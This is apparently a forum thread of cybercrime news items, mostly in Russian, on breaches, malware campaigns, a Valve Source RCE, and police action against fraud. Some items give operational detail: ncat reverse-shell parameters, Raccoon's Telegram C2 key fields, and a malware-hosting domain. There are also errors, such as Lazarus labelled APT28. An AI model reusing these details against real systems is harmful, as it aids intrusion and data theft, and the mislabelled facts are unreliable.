Сотрудники ФСБ России и полиции устанавливают причастных к противоправной
деятельности и пострадавших лиц.
«Призываем граждан внимательно относиться ко всем звонкам, содержанием которых
является требование совершить по инструкции собеседника финансовые операции. В
случае выявления мошеннических действий следует немедленно обратиться в
правоохранительные органы», - подчеркнули в ФСБ России.
Популярный среди киберпреступников форум OGUsers оказался взломан в четвёртый раз за два года. Атаковавшие площадку злоумышленники уже выставили на продажу базу данных сайта, в которой содержатся данные пользователей и их личные сообщения.
Форум OGUsers известен тем, что различные киберпреступники используют его для продажи взломанных аккаунтов пользователей социальных сетей. Такие учётные записи злоумышленники добывают с помощью атак SIM-swapping и брутфорса.
В начале 2021 года площадкой заинтересовались представители Facebook, Instagram, TikTok и Twitter, инициировавшие совместную кампанию с целью пресечь деятельность участников OGUsers.
На днях специалисты компании KELA заявили, что администратор OGUsers признал свежий взлом форума. По его словам, атакующим удалось загрузить на сервер веб- шелл.
Изначально было непонятно, смогли ли злоумышленники вытащить базу данных, однако позже преступники сами развеяли все сомнения, опубликовав объявление о продаже БД OGUsers за $3000.
Знакомые с ситуацией источники рассказали BleepingComputer, что киберпреступники взломали форум OGUsers 11 апреля. В общей сложности пострадали около 350 тыс. участников онлайн-сообщества.
• Source: https://www.bleepingcomputer[.]com/...s-a-charm-ogusers-hacking- forum-hacked-again/
Группа ИБ-исследователей, известная под названием Secret Club, заявляет, что игры компании Valve, построенные на движке Source, подвержены RCE-уязвимости.
__https://twitter.com/x/status/1380960120725733376
Один из исследователей говорит, что инженерам Valve сообщили об этой проблеме около двух лет назад, но баг все еще не устранен, и его можно эксплуатировать в новейшей версии Counter Strike: Global Offensive (CS: GO). Среди других игр, которые используют движок Source, можно перечислить Half-Life, Half-Life 2, Garry's Mod, Team Fortress, Left 4 Dead и Portal.
Участники Secret Club расстроены тем, что они по-прежнему не могут обнародовать технические детали уязвимости, так как она все еще влияет на некоторые игры компании. Хотя принятые в таких случаях 90 дней на исправление ошибки давно прошли, специалисты придерживаются строгих этических принципов и не делятся подробностями проблемы, ведь раскрытие информации поставит под угрозу миллионы пользователей.
Увлеченный реверс-инжинирингом студент, известный как Флориан, рассказал журналистам, что еще два года назад он уведомил Valve о проблеме через HackerOne. Уязвимость в движке связана с повреждением информации в памяти и присутствует во многих играх Valve. Исключением являются игры, построенные на базе Source 2, например, Titanfall. Последний раз Флориан получал ответы от Valve около шести месяцев назад, когда компания выплатила ему вознаграждение и заявила, что работает над исправлением ошибки и уже решила ее в одной конкретной игре на движке Source (в какой именно, неизвестно).
Ситуация усугубляется тем, что проблема затрагивает CS: GO, последнее обновление которой было выпущено 31 марта текущего года. Дело в том, что игра привлекает порядка 27 миллионов уникальных игроков ежемесячно, а уязвимость может использоваться для запуска произвольного кода на машине пользователя. И по состоянию на 10 апреля 2021 года CS: GO все еще была уязвима.
Видео ниже демонстрирует, как злоумышленник может воспользоваться багом и выполнить код на целевом компьютере, просто отправив жертве приглашение в игру Steam.
Флориан подтверждает, что в одной из игр дефект действительно был исправлен, но он тоже не раскрывает названия этой игры:
«Мы намеренно не упомянули об этом, потому что мы не хотим, чтобы люди искали патч в бинарных файлах игры, ведь это значительно облегчило бы усилия по созданию эксплоита для всех других непатченных игр».
Click to expand...
Карл Скоу (Carl Schou), один из ключевых участников Secret Club, рассказал Bleeping Computer, что злоумышленник может использовать уязвимость для кражи конфиденциальной информации жертвы, включая учетные данные или банковские данные.
Secret Club выложили уже несколько видеороликов от нескольких исследователей, демонстрирующих эксплуатацию RCE в CS: GO. К примеру, в ролике ниже показано использование уязвимости во время присоединения к вредоносному community- серверу.
Компания Valve пока никак не прокомментировала заявления специалистов и ситуацию с патчами.
Источник: xakep.ru/2021/04/13/valve-source-rce/
Сотрудники Службы безопасности Украины заблокировали деятельность нелегальных "call-центров". Выдавая себя за "известные брокерские компании", злоумышленники выманивали у граждан ЕС и СНГ деньги - чтобы "клиенты заработали на бирже".
По данным спецслужбы, группа украинцев и граждан иностранных государств организовали в Киеве противоправную схему. Они, находясь в Украине, координировали деятельность трансграничного мошеннического механизма.
Оперативники спецслужбы установили, что злоумышленники звонили гражданам ЕС и СНГ от имени "известных" брокерских компаний и предлагали заработать на торговле валютой и криптовалютой, ценными бумагами, золотом и нефтью. Дельцы "гарантировали" клиентам получение сверхдоходов в короткие сроки. После получения значительной суммы денег, присваивали средства и блокировали вкладчика.
Также участники группировки, используя контактные базы лиц, в отношении которых ранее вели аналогичные мошеннические действия, предлагали вкладчикам за "комиссию" вернуть утраченные инвестиции. Получив средства, дельцы сразу прерывали связь с клиентом.
Правоохранители провели обыски по местам проживания организаторов и участников группировки и расположения "call-центров". В ходе следственных действий изъяты:
Сейчас следственные действия продолжаются для привлечения к ответственности всех организаторов сделки.
Операция проводилась сотрудниками Главного управления контрразведывательной защиты интересов государства в экономической сфере СБ Украины.
• Source: ssu.gov.ua/novyny/sbu-zablokuvala-masshtabnu-skhemu-zavolodinnia- koshtamy-hromadian- yes?fbclid=IwAR3aF_LyFZHINuuaUjTuTqeHSH-a7AcRC_K6KOhU_vR85oCAi3XFKTsQQBY
Министерство юстиции США выдвинуло обвинения против двух граждан Северной Кореи, которых связывают с хак-группой Lazarus (она же Hidden Cobra, Dark Seoul и APT28) и называют одними из главных грабителей банков в мире.
Также в новом обвинительном заключении были расширены обвинения, выдвинутые в 2018 году против Пак Чин Хёка (Park Jin Hyok, 박진혁 aka Jin Hyok Park и Pak Jin Hek), северокорейского хакера, который якобы ответственен за массовые атаки шифровальщика WannaCry в 2017 году, атаку на Центробанк Бангладеш в 2016 году, взлом компании Sony Pictures в 2014 году и так далее.

Новые обвинения были предъявлены 31-летнему Джон Чин Хёку (Jon Chang Hyok, 전 창혁) и 27-летнему Киму Иру (Kim Il, 김일).


Официальные лица заявляют, что все три хакера работают на Главное разведывательное управление Северной Кореи и с 2014 года участвовали в следующих хакерских операциях:
«Оперативники Северной Кореи, использующие клавиатуры, а не маски и оружие, являются ведущими грабителями банков 21-го века», — заявляет помощник генерального прокурора Джон Демерс.
Click to expand...
Источник: xakep.ru/2021/02/18/new-lazarus-indictment/
Правоохранители нанеcли удар по DDoS-платформам: операция «PowerOFF» ликвидирует Dstat.cc
Международная операция «PowerOFF», организованная Центральным управлением по
борьбе с киберпреступностью (ZIT) при прокуратуре Франкфурта совместно с
федеральной и земельной полицией Германии, привела к ликвидации платформы
Dstat.cc , которая использовалась киберпреступниками для координации DDoS-
атак. В результате операции были задержаны два подозреваемых — мужчины 19 и 28
лет — причастные к управлению платформой и параллельно администрировавшие
рынок синтетических наркотиков Flight RCS , доступный в открытом интернете.
Что такое Dstat.cc и как работала платформа? Dstat.cc, действовавшая как «сервис обзоров», не предоставляла DDoS-услуги напрямую, но служила для обмена опытом и рекомендаций по так называемым «стрессерам» — сервисам, изначально созданным для легального стресс-тестирования веб-сайтов. На практике стрессеры часто применяются для перегрузки целевых серверов огромным количеством запросов, вызывая их временную недоступность. Платформа Dstat.cc позволяла злоумышленникам координировать атаки через Telegram-канал, в котором было около 6600 участников. Теперь канал заблокирован, а сообщения удалены.
Масштаб и международная координация: В рамках операции «PowerOFF» были проведены обыски и изъятия на семи объектах в Германии, Франции, Греции, Исландии и США. Эта операция — часть международного сотрудничества, направленного на пресечение деятельности DDoS-сервисов. Ранее подобные платформы были заблокированы в Великобритании и Польше, а пользователей таких сервисов предупреждают о последствиях.
Цели и последствия: Dstat.cc использовалась активистами и кибергруппами, такими как Killnet и Passion , для атак на важные инфраструктуры в Европе и США, включая госпитали и системы здравоохранения. DDoS-атаки стали популярным инструментом политического давления и шантажа , в том числе среди хактивистов, которые видят в них средство влияния на государственные структуры и бизнес.
Заявления официальных лиц: «Мы еще раз доказали, что киберпреступники не могут скрыться даже за «анонимностью» интернета. Мы идентифицируем их и разбиваем их инфраструктуру», — отметил д-р Бенджамин Краузе, руководитель ZIT.
Вице-президент Федерального уголовного ведомства Германии, Мартина Линк, подчеркнула, что этот успех — результат слаженной работы международного сотрудничества: «Мы продолжаем и будем продолжать эффективную борьбу с киберпреступностью. Безопасность и правопорядок важны и в цифровом мире».
Пиратский контент транслировался на более чем 2200 телеканалов, а нелегальные товары продавались в соцсетях.
28 ноября Европол объявил о завершении международной операции, которая проводилась 6 месяцев с мая по ноябрь совместно с Интерполом и Евроюстом. В операции приняли участие 27 стран Европы и Америки.
Были задержаны 14 подозреваемых, которых Европол обвиняет в том, что они ведут «расточительный образ жизни» за счет незаконно полученных доходов. Операция проходила в Колумбии и Бразилии, однако, мошенники были арестованы в Испании.
Правоохранительные органы на нескольких континентах:

Согласно материалам дела, один из подозреваемых зарабатывал €150 000 в месяц, «ведя расточительный образ жизни в роскошном доме, владея дорогими автомобилями и путешествуя по всему миру».
«Преступная сеть посвятила себя крупномасштабному маркетингу и распространению пиратского аудиовизуального контента в Интернете», — заявил Европол. «В рамках операции испанская полиция отключила 32 сервера, на которых размещался незаконный контент, и конфисковала деньги, документы и 2 автомобиля класса Люкс».
Операторы знаменитого вредоноса Raccoon, специализирующегося на краже информации, нашли новый канал для распространения. Также злоумышленники теперь используют Telegram для хранения и обновления адресов командного сервера (C2).
Впервые Raccoon замаячил на ландшафте киберугроз в апреле 2019 года. В новых версиях вредоносной программы авторы начали задействовать мессенджер Telegram, который помогает им хранить и поддерживать в актуальном состоянии адреса C2.
Как отметили специалисты антивирусной компании Avast, такой подход позволяет злоумышленникам обеспечить надёжное управление зловредом на лету.
Исследователи считают, что за разработкой Raccoon стоят связанные с Россией киберпреступники. Инфостилер может не только воровать пароли, но и извлекать файлы cookies, данные криптокошельков, а также логины и пароли из имейл- клиентов и мессенджеров.
«Также стоит отметить, что Raccoon может загружать и выполнять произвольные файлы, что делает его крайне опасным для конечного пользователя», — пишет Владимир Мартьянов из Avast.
Ранее операторы Raccoon распространяли его в виде файлов в формате .IMG, которые располагались в принадлежащем злоумышленникам Dropbox-аккаунте. Ссылки на эти файлы киберпреступники рассылали в рамках BEC-кампаний (business email compromise), нацеленных на финансовые организации.
Теперь, по словам Мартьянова, операторы прибегают к более креативным методам: Raccoon доставляется на устройства жертв под видом читов для игр, «кряков» для различного софта (модов для Fortnite, Valorant и NBA2K22) и т. п.
Чтобы взаимодействовать с C2 через Telegram, Raccoon использует четыре значения, жёстко заданные в коде вредоноса:
MAIN_KEY;
URL Telegram-шлюзов с именем канала;
BotID — шестнадцатеричная строка, которая отправляется C2-серверу;
TELEGRAM_KEY — ключ для расшифровки адреса C2, получаемый из Telegram.
• Source: <https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash- panda-abuses-telegram/>
При разборе недавних атак, нацеленных на внедрение майнера Monero на Linux- серверы, исследователи из Bitdefender обнаружили новый инструмент для взлома паролей к SSH. Судя по применяемым техникам и тактикам, инициатором этой криптоджекинг-кампании является румынская криминальная группировка, которую аналитики отслеживают с прошлого года.
Тулкит с именем Diicot brute (можно перевести как «Кошмар для DIICOT» — румынского Управления по борьбе с оргпреступностью и терроризмом) работает по модели SaaS, подключаясь к ряду серверов для загрузки обновлений, дополнительных скриптов и отправки результатов сканов / попыток взлома. Создатель брутфорсера утверждает, что его продукт способен отсеивать ханипоты, однако в Bitdefender он все-таки засветился.
Просмотр данных на ловушках показал, что Diicot brute был введен в оборот в январе. Злоумышленники пока проводят атаки с небольшого количества IP-адресов и, по всей видимости, не используют взломанные системы для дальнейшего распространения инфекции.
Результаты поиска уязвимых систем Linux и попыток брутфорса собираются через Discord: возможности мессенджера обходятся дешевле, чем хостинг C2-сервера, к тому же здесь есть дополнительное удобство — просмотр всей информации в отдельном канале.
Атака начинается со сканирования портов; обнаружив SSH-сервер, Diicot brute пытается получить к нему доступ. В случае успеха на машину скачивается файл .93joshua — загрузчик майнера XMRig. На сервере-источнике, прописанном в Сингапуре, обнаружены также другие вредоносные файлы, в том числе два разных DDoS-бота. Ассоциированный с IP-адресом домен mexalz[.]us используется для хостинга зловредов как минимум с февраля.
• Source: [https://www.bitdefender.com/blog/la...roup-running-an-active- cryptojacking-campaign](https://www.bitdefender.com/blog/labs/how-we-tracked- a-threat-group-running-an-active-cryptojacking-campaign)
Необычная вредоносная программа, обнаруженная недавно экспертами SophosLabs, борется с пиратством. Обосновавшись в системе жертвы, вредонос не даёт ей зайти на известные пиратские сайты.
Как известно, киберпреступники часто распространяют вредоносные программы под прикрытием фейкового пиратского софта или «кряков». Пользователь думает, что скачивает свежий фильм или популярную видеоигру, а получает зловред.
Как правило, под пиратский софт маскируют программы-вымогатели, похищающие данные трояны или вредоносные криптомайнеры. Другими словами, все те виды зловредов, которые приносят злоумышленникам максимальную прибыль.
В новом отчёте SophosLabs специалисты поделились находкой — вредоносом, препятствующим посещению знаменитого пиратского торрент-сайта The Pirate Bay.
«Это, пожалуй, наиболее странный вредонос, с которым мы сталкивались за последнее время. Основная цель этой программы — уйти от наиболее типичного поведения вредоносных программ», — пишут исследователи.
«Этот зловред не ищет и не крадёт пароли жертвы, не требует выкуп, а лишь препятствует посещению пиратских сайтов. Для этого модифицируется файл HOSTS».
Эксперты отметили, что необычная вредоносная программа распространяется через Discord и, что удивительно, на тех же пиратских ресурсах.
• Source: <https://news.sophos.com/en-us/2021/06/17/vigilante-antipiracy- malware/>
Житель Херсонской области, распространяя вредоносное программное обеспечение, пытался получить доступ к личным данным пользователей компьютеров. Сейчас киберполицейские устанавливают количество пострадавших.
Работники отдела противодействия киберпреступлениям в Херсонской области Департамента киберполиции совместно со следователями отделения полиции № 2 установили, что житель области все хакерские операции проводил из собственного дома. Он самостоятельно создал вредоносное программное обеспечение и распространял его в виде писем со ссылкой. Когда пользователи открывали ссылку, то злоумышленник получал удаленный доступ к компьютеру потерпевшего, считывал учетные записи, мог изменить пароль и заблокировать доступ действительным пользователям.
Правоохранители провели санкционированный обыск по месту жительства хакера и изъяли компьютерную технику.
Сейчас решается вопрос о сообщении подозрения хакеру. Открыто уголовное производство по ч. 1 ст. 361-1 (Создание с целью использования, распространения или сбыта, а также распространение или сбыт вредоносных программных или технических средств, предназначенных для несанкционированного вмешательства в работу электронно-вычислительных машин, компьютеров) Уголовного кодекса Украины. Процессуальное руководство в уголовном производстве осуществляет Алешковская окружная прокуратура. Злоумышленнику может грозить до двух лет лишения свободы.
Encrypted phone firm Encrochat, whose customer base was primarily serious organized criminals, used the Signal protocol as part of its encrypted messaging application, according to a law enforcement document obtained by Motherboard.

](https://www.vice.com/en/article/pkdjab/encrochat-signal-protocol-encryption)
The news shows what police may do when confronted with robust, end-to-end encryption: turn to hacking the phone itself.
 www.vice.com

](https://protos.com/hackers-target-macos-users-through-pirated-apps-that- steal-crypto/)
Bootleg copies of popular software are circulating that contain files which download infected crypto wallets onto your MacOs device.
 protos.com
мобильной связи оформили на себя свыше тысячи SIM-карт каждый, ведомство проведет проверку.
Роскомнадзор выявил у российских операторов более 900 абонентов, каждый из которых оформил на свое имя свыше тысячи SIM-карт. Об этом сообщили в пресс- службе ведомства.
Операторы передали сведения о 351,1 млн номеров. Более детальный анализ сведений выявил случаи оформления большого количества SIM-карт на одно физлицо. Ведомство проанализировало переданные сведения операторов об абонентах и выявило 916 граждан, которые имеют более чем тысячу SIM-карт каждый. В общей сложности эти граждане владеют свыше 6,6 млн номеров.
Click to expand...
В Роскомнадзоре отмечают, что сейчас ограничений по количеству SIM-карт, которые можно приобрести на один паспорт, нет. По правилам оказания услуг телефонной связи, мобильный оператор не вправе отказать клиенту в оформлении договора, если с паспортом последнего все в порядке. Но такое количество номеров, оформленных на одного человека, может свидетельствовать о мошеннических действиях со стороны абонента, дилера или оператора связи, поэтому ведомство проведет проверку.
Роскомнадзор совместно с операторами и другими заинтересованными ведомствами проведет проверку информации по пользователям, которые владеют большим количеством SIM-карт, установит законность процесса их оформления.
Click to expand...
В ведомстве напомнили, что согласно закону «О связи», мобильный оператор обязан самостоятельно проверять достоверность сведений об абоненте. Это касается и данных о конечных пользователях услуг, чьи SIM-карты оформлены на юридических лиц и ИП.
Отмечается также, что долгое время в России фиксировалась высокая доля «серых» SIM-карт, которые бесконтрольно раздавались на улице и в дальнейшем могли использоваться в противоправных целях, в том числе, для мошенничества и телефонного терроризма.
Роскомнадзор следит за тем, чтобы операторы вносили достоверные сведения в свои базы данных, а также ведет специальную информационную систему, которая обеспечивает проверку с учетом данных МВД, ФНС и ЕСИА. К ней подключились все операторы связи.
(c) ТАСС
Накануне за помощью к черногорским полицейским обратился горожанин, который в погоне за большим кушем лишился всех своих сбережений.
Полицейские выяснили: в ходе мониторинга сети Интернет черногорец увидел ссылку на торговую площадку, прошёл по ней и оставил свой номер телефона. Через некоторое время с горожанином по телефону связались менеджеры и предложили зарабатывать на финансовой Интернет-бирже, продавая криптовалюту. Черногорец зарегистрировался на электронной торговой платформе и создал личный кабинет, чтобы получить возможность отслеживать все поступления.
По указанию звонивших заявитель для игры на бирже должен был осуществить ряд денежных переводов на различные банковские счета. Сумма, внесённая на брокерский счет горожанина, росла, что мотивировало черногорца продолжать играть. В общей сложности заявитель лишился более 604 тысяч рублей.
Мужчина понял, что стал жертвой аферистов лишь после того, когда попробовал вывести накопления, но попытка обернулась неудачей. А телефоны инвестиционных консультантов стали недоступны для звонка.
Установлено, что черногорцу звонили с десяти разных мобильных номеров, зарегистрированных в Московской и Новосибирской областях, а также в Республике Башкортостан.
Следственным отделом полиции г. Черногорска возбуждено уголовное дело по признакам преступления, предусмотренного ч.3 ст.159 УК РФ «Мошенничество, совершённое в крупном размере».
Примечательно, что потерпевший был прекрасно наслышан о различных схемах обмана, как из СМИ, так и из личных бесед с полицейскими во время поквартирных обходов. Однако такая осведомлённость оказалась слабее желания заработать лёгкие деньги, помноженного на чувство азарта.
Эксперты SentinelOne обнаружили новую иранскую хак-группу Agrius, которая атакует израильские организации по меньшей мере с декабря 2020 года. Исследователи предупреждают, что хакеры намеренно уничтожают данные своих жертв, и маскируют такие атаки под работу шифровальщика, требуя выкуп.
В первых атаках Agrius использовала малварь для удаления данных (вайпер, от англ. to wipe) под названием DEADWOOD (он же Detbosit). Ранее этот инструмент использовался для атак и другими иранскими хак-группами.
Для установки DEADWOOD группировка, как правило, эксплуатировала уязвимости на незащищенных серверах, а затем разворачивала в системе жертвы веб-шелл ASPXSpy и бэкдор IPSec Helper. Когда все было готово, хакеры заражали машину DEADWOOD, уничтожали разделы MBR и стирали файлы, а затем запрашивали у пострадавших выкуп, чтобы отвлечь ИТ-специалистов от реальной сути атаки.

Однако DEADWOOD был известной малварью, и его могли обнаружить. Поэтому в конце 2020 года группировка создала собственного вредоноса, который получил название Apostle. Причем ранняя версия малвари работала некорректно, порой не уничтожала файлы, и хакеры были вынуждены снова прибегать к проверенному вайперу DEADWOOD.
Во второй версии Apostle эти ошибки были исправлены, а также в код добавили настоящую процедуру шифрования файлов, что превратило превратив Apostle в полноценное вымогательское ПО. Впрочем, по словам исследователей, основная цель Apostle – это именно уничтожение данных, а злоумышленниками вряд ли движет финансовая выгода.
На израильские компании злоумышленники переориентировались в конце 2020 года, а до этого группировка атаковала цели на Ближнем Востоке. Эксперты SentinelOne отмечают, что эта «смена курса» совпала с эскалацией напряженности между правительствами Тель-Авива и Тегерана, а также произошла после ряда других кибератак. К примеру, в 2020 и 2021 году другие иранские хакеры использовали вымогателя Pay2Key для атак на Израильские компании, а вслед за этим их атаковал вредонос n3tw0rm.
«Непосредственная близость кампаний Agrius и n3tw0rm предполагает, что они могут быть частью крупной и скоординированной стратегии Ирана. Утечки, связанные с Lab Dookhtegan и операциями вымогателя Project Signal, так же это подтверждают», — заключают исследователи.
Click to expand...
Источник: xakep.ru/2021/05/28/apostle/
Эксперты Bitdefender [предупредили](https://labs.bitdefender.com/2021/04/from- cracks-to-empty-wallets-how-popular-cracks-lead-to-digital-currency-and-data- theft/), что взломанные копии Microsoft Office и Adobe Photoshop похищают файлы cookie и данные криптовалютных кошельков Monero у пользователей, которые устанавливают пиратское ПО.
Специалисты пишут, что некоторые пиратские версии обеих программ «укомплектованы» вредоносным ПО, которое крадет cookie браузерных сессий (в случае Firefox, вообще всю историю профиля пользователя), захватывает кошельки криптовалюты Monero и извлекает другие данные через BitTorrent, предварительно открыв бэкдор на целевой машине и отключив брандмауэр.
Так, после запуска взломанная программа устанавливает экземпляр ncat.exe (легитимный инструмент для отправки необработанных данных по сети) и использует batch-файл chknap.bat, а также Tor-прокси.
[](https://xakep.ru/wp- content/uploads/2021/04/346025/image.png)
«Эти инструменты работают вместе, чтобы создать мощный бэкдор, который обменивается данными с управляющим сервером через Tor: бинарник ncat прослушивает порт Tor-прокси (--proxy 127.0.0.1:9075) и использует параметр --exec , который позволяет отправлять весь ввод от клиента в приложение, а ответы — обратно клиенту через сокет (обычное поведение реверс-шелла)», — говорят исследователи.
Click to expand...
Операторам малвари, стоящим за этой атакой, требуется довольно много времени, чтобы проанализировать скомпрометированную ими среду и решить, что стоит украсть. Аналитики полагают, что кража всего профиля Firefox была скорее случайной, чем намеренной, и злоумышленниками подойдет любой другой браузер, установленный на устройстве.
Источник: xakep.ru/2021/04/15/malware-cracks/
Эксперты Guardicore Labs обнаружили, что вредонос Purple Fox, обладающий возможностями руткита и бэкдора, получил обновление и теперь может распространяться на доступные Windows-машины подобно червю.
Впервые эта малварь была выявлена в 20018 году, после заражения не 30 000 устройств. Чаще всего она используется в качестве загрузчика для развертывания других вредоносных программ. В прошлом Purple Fox так же была нацелен на Windows-системы и обычно заражала машины через браузеры, после эксплуатации уязвимостей, связанных с повреждением информации в памяти и повышением привилегий.
По информации Guardicore Labs, начиная с мая 2020 года, атаки Purple Fox значительно участились, в начале 2021 года достигнув отметки в 90 000, то есть заражений стало на 600% больше.

Активное сканирование портов и попытки атак начались в конце прошлого года. Хуже того, теперь после обнаружения уязвимой Windows-системы, доступной через интернет, задействуется недавно добавленный в Purple Fox модуль червя, который отвечает за перебор паролей от SMB. Невзирая на появление этого модуля, вредонос по-прежнему использует для распространения фишинговые кампании и уязвимости в браузерах.
Перед перезапуском зараженных устройств, Purple Fox устанавливает на них опенсорсный руткит-модуль hidden, чтобы скрыть удаленные файлы, а также папки и записи реестра Windows, созданные в зараженных системах. Затем, после развертывания руткита и перезагрузки устройства, малварь переименовывает свой DLL-пейлоад в соответствии с системной DLL Windows и настраивает ее на запуск при запуске системы.
В последствии, когда вредоносная программа запускается при запуске системы, зараженная машина работает как червь, постоянно сканируя интернет в поисках других целей, пытаясь скомпрометировать их и добавить в ботнет.

На данный момент Purple Fox развернула свои дропперы и дополнительные модули на 2000 взломанных серверов, среди которых машины на базе Windows Server, где работает IIS версии 7.5 и Microsoft FTP, а также серверы с Microsoft RPC, Microsoft Server SQL Server 2008 R2, Microsoft HTTPAPI httpd 2.0, а также Microsoft Terminal Service.
«Во время исследования мы обнаружили инфраструктуру, которая, похоже, состоит из мешанины уязвимых и эксплуатируемых серверов, на которых размещаются пейлоады вредоносного ПО, зараженных машин, которые служат узлами для постоянно распространяющихся кампаний, и серверной инфраструктуры, которая, похоже, связана с другими вредоносными кампаниями», — пишут исследователи.
Click to expand...
Источник: xakep.ru/2021/03/24/purple-fox/
Były szef Krajowej Agencji ds. Cyberbezpieczeństwa, Chris Krebs, nazwał
ransomware największym zagrożeniem cybernetycznym na świecie i wezwał wojsko
do kontrataku.
Powiedział, że wojsko powinno podjąć środki zaradcze, takie jak publiczne
ujawnienie tożsamości napastników (doxxing)

](https://www.silicon.co.uk/workspace/us-cyber-boss-ransomware-382058)
US military should use 'information warfare' to strike back against ransomware gangs, as cyber-attacks threaten to disable state and local services
 www.silicon.co.uk
Главный советник Белого дома по кибербезопасности Энн Нойбергер осуществила серию «тихих» виртуальных переговоров со своим коллегой из России.
Российские и американские чиновники в течение последних месяцев ведут «самые глубокие за последние годы» переговоры, в том числе о контроле за вооружением и кибербезопасности. Об этом сообщает The New York Times.
Издание утверждает, что с момента июньской встречи в Женеве президентов Владимира Путина и Джо Байдена делегации ответственных вашингтонских чиновников как минимум три раза побывали в Москве. Параллельно проходили встречи на территории третьих стран, включая Швейцарию и Финляндию.
В переговорах принимала участие и заместитель советника президента США по кибербезопасности Энн Нойбергер, которая, по данным издания, провела серию «тихих, виртуальных встреч со своим кремлевским коллегой». России, в частности, передали имена и другую информацию о хакерах, совершающих атаки на американские предприятия и учреждения, отмечает издание.
Один из источников газеты сообщил, что на данный момент в Белом доме ожидают арестов по итогам передачи информации. Это станет проверкой серьёзности слов президента России о планах сотрудничества в сфере кибербезопасности.
source: nytimes.com/2021/10/31/world/europe/biden-putin-russia-united- states.html
Европол сообщил, что полиция Франции и Израиля ликвидировала преступную сеть. Судя по всему, мошенники обманом получили от французских властей пособия по безработице в связи с COVID-19 на 12 миллионов евро.
Во Франции задержали шестерых человек, подозреваемых в том, что через 3600 подставных компаний они подали заявки на получение государственной помощи. Эти средства предназначались для того, чтобы помогать предприятиям выплачивать зарплаты сотрудникам во время карантина из-за пандемии.
По данным полицейской службы, обманом получив деньги во французских банках, группа выводила их за границу и перевозила через Европу, а затем обменивала на криптовалюту.
В заявлении Европола сказано, что у группы якобы был контактный центр в Нетании — это курортный город недалеко от Тель-Авива. Судя по всему, «крупномасштабной аферой» руководили именно оттуда.
Недалеко от швейцарской границы французская полиция арестовала главного подозреваемого — 30-летнего гражданина Франции и Израиля. Вместе с супругой подозреваемый направлялся в Женеву, оттуда они собирались улететь в Тель-Авив. По данным правоохранителей, билеты они забронировали в последнюю минуту.
А всего через час после ареста полиция «провела операции на нескольких объектах в Париже (XIX округ) и его пригородах (Пантен), задержала их сообщников — все они родственники — и обыскала помещения, где, как предполагалось, была спрятана крупная сумма денег».
По сообщению Европола, в тот же вечер на парковке в Париже полицейские нашли 1 765 630 евро и 3420 долларов наличными — деньги лежали в несгораемых и водонепроницаемых сумках. Кроме того, правоохранители обнаружили трое роскошных часов на сумму 230 тысяч евро и ювелирные изделия на 30 тысяч евро.
Также французские власти изъяли свыше 6,2 миллиона евро с банковских счетов преступной группы.
Тем временем израильская полиция задержала сообщника группы и обыскала контактный центр в Нетании, изъяв обнаруженные телефоны и высокотехнологичное IТ-оборудование.
• Source europol.europa.eu/newsroom/news/six-arrested-for- siphoning-%E2%82%AC12-million-in-fraudulent-covid-19-unemployment-payments- france
Суд Октябрьского района Минска вынес приговор по уголовному делу о хищении имущества путем введения в компьютерную систему ложной информации, сообщает БЕЛТА со ссылкой на пресс-службу Мингорсуда.
Фигурант дела - молодой минчанин - ранее уже осуждался за мошенничество и хищение путем использования компьютерной техники. Тогда суд Центрального района Минска приговорил его к трем годам лишения свободы с отсрочкой исполнения наказания на 2 года. Однако молодой человек выводов для себя не сделал и совершил новые преступления.
По информации обвинения, парень с 14 июля по 1 октября 2020 года, используя отработанную преступную схему, обманул девятерых абонентов одного из операторов связи, среди которых были малолетние, похитив Br1,3 тыс. С помощью мобильного приложения он перевел деньги на свой счет.
По этому уголовному делу молодой человек приговорен к 3 месяцам ареста. Однако, учитывая вынесенный 15 декабря 2020 года приговор (судимость не была погашена), окончательно ему назначено 3 года лишения свободы в колонии общего режима. В пользу потерпевших взыскан материальный ущерб в размере Br800.
Приговор суда не вступил в законную силу и может быть обжалован и опротестован в апелляционном порядке.
Patients and employees from 11 hospitals in the US have had their personal information exposed after hackers reportedly published tens of thousands of records online.
The files come from Leon Medical Centers, which runs eight facilities in Florida, and Nocona General Hospital, which has three in Texas.
The compromised information includes patients’ names, addresses and birthdays, medical diagnoses and letters to insurers. Also exposed was a folder containing background checks on hospital staff, according to NBC.
The unnamed attack group is apparently well known to researchers and is usually in the business of double extortion ransomware, whereby data is stolen and posted to a dark web blog in a bid to force payment.
However, it’s unclear why so many records were published in the first instance. Usually such groups post a small slice of what they have to prove they mean business, and only expose large volumes of data in retribution if the victim organization refuses to comply.
Adding further mystery to the case, an attorney for Nocona General Hospital told the US news network that the organization does not appear to have suffered any ransomware infection or received a ransom demand.
In the case of the other victim, Leon Medical Centers announced last month that it had been breached in November 2020, in a raid that compromised: patients’ names, contact info, Social Security numbers, financial information, dates of birth, family information, medical records, prescription information, diagnosis and treatment history, and health insurance information.
However, in a filing with the US Department of Health and Human Services, only 500 individuals were thought to have been exposed.
Cyber-attacks on global healthcare organizations (HCOs) surged by 45% in the final two months of 2020 versus the previous two months, more than double the rate of those targeting other sectors, according to Check Point.
Ransomware recorded the largest increase overall and poses the biggest threat to HCOs, the vendor claimed.
Его деятельность пресекли сотрудники управления по противодействию киберпреступности УВД Гродненщины.
35-летний мужчина через интернет получил заказ об изготовлении вредоносной программы, которая бы позволила получить доступ к данным учётных записей различных сайтов, обходя их защиту. Впоследствии похищенные сведения используются злоумышленниками в преступных целях.
Подозреваемому за выполнение заказа выплатили сумму, эквивалентную 347 рублям в биткоинах. Данный факт выявлен сотрудниками управления по противодействию киберпреступности УВД Гродненщины. В компьютере «программиста» обнаружено ещё несколько проектов вирусных приложений. Предварительно установлено, что заказчики были из стран СНГ и Китая. За разработку и сбыт вредоносных компьютерных программ в отношении подозреваемого возбуждено уголовное дело.
Приложение для записи экрана iRecorder – Screen Recorder, насчитывавшее более 50 000 загрузок в Google Play, в качестве «обновления» получило троян удаленного доступа. Интересно, что вредоносная функциональность появилась лишь год спустя после публикации приложения в магазине Google Play.
[](https://xakep.ru/wp- content/uploads/2023/05/425118/iRecorder_Google_Play.jpg)
Эксперты компании ESET, обнаружившие угрозу, [рассказывают](https://www.welivesecurity.com/2023/05/23/android-app-breaking- bad-legitimate-screen-recording-file-exfiltration/), что iRecorder – Screen Recorder появился в магазине еще в сентябре 2021 года, но троянизировали его при помощи обновления до версии 1.3.8 в августе 2022 года.
Так как приложение предназначалось для записи экрана, это упростило злоумышленникам запрос разрешений на запись аудио и доступ к файлам на зараженных устройствах, ведь это не вызывало подозрений.
